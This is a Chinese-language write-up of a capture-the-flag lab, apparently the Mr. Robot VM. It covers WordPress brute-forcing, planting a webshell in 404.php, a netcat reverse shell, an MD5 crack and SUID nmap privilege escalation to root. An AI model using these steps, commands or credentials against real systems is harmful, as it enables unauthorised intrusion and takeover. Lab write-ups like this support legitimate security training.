nmap 192.168.164.0/24

22端口被关闭了 访问80网站,很像一个终端的页面

访问robots.txt拿到第一个flag

还有一个dic文件,访问下载下来是个字典文件

扫描目录 发现有wordpress后台页面


sort 排序 -u 去重
sort -u fsocity.dic > dic.txt
将其保存为新的字典 ,去登录页面尝试用户名和密码的爆破
直接用burp来爆破
先爆用户名 得到是elliot

爆出密码ER28-0652

成功登录后台
- 1.wordpress后台登录地址
- http://192.168.164.138/wordpress/wp-admin
-
- 2.修改404页面,写入webshell (自行设置监听IP和端口)
- appearance----editer----404.php
-
- 3.在攻击机上面开启监听4444端口
- nc -lvpp 444
-
- 4.访问404页面,反向连接到主机 (404地址固定)
- http://192.168.164.138/wordpress/wp-content/themes/twentyfifteen/404.php
-
- 5.交互式连接
- python -c 'import pty;pty.spawn("/bin/bash")'

进入后台 找到编辑404页面
将webshell脚本写进去 保存

nc -lvvp 4444 然访问404.php
连接成功

交互式连接
python -c 'import pty;pty.spawn("/bin/bash")'

进入home目录 就有个robot用户
进入 发现有flag 但是没有权限查看

还有一个password MD5加密的 可以读取到

这个md5直接拿去解密

那么就得到了用户名robot,密码abcdefghijklmnopqrstuvwxyz

登录robot用户后拿到第二个flag
Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,井且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行. SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。
- 1、查看具有SUID的二进制可执行文件
- find / -user root -perm -4000 -print 2>/dev/null
-
- 2、一直可用来提权的linux可行性的文件列表如下:
- Nmap 、 Vim 、 find 、 Bash 、 More 、 Less 、Nano 、 cp
-
- 3、进入namp可交互模式(仅限2.02到5.21版本)
- namp --interactive
-
- 4、提权root
- !sh
查看具有SUID的二进制可执行文件

看到nmap
- 进入namp可交互模式(仅限2.02到5.21版本)
- namp --interactive
-
- 提权root
- !sh

成功拿到root权限